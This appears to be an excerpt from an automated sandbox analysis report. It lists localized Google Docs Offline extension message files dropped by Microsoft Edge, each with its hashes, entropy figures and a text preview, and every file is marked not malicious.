Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1028
Entropy (8bit):4.797571191712988
Encrypted:false
SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:970544AB4622701FFDF66DC556847652
SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:false
Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):994
Entropy (8bit):4.700308832360794
Encrypted:false
SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:A568A58817375590007D1B8ABCAEBF82
SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:false
Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2091
Entropy (8bit):4.358252286391144
Encrypted:false
SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:4717EFE4651F94EFF6ACB6653E868D1A
SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:false
Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2778
Entropy (8bit):3.595196082412897
Encrypted:false
SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:false
Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1719
                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):936
                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3830
                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1898
                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):914
                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):851
                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):878
                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2766
                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):978
                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):907
                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):914
                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):937
                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                            Malicious:false
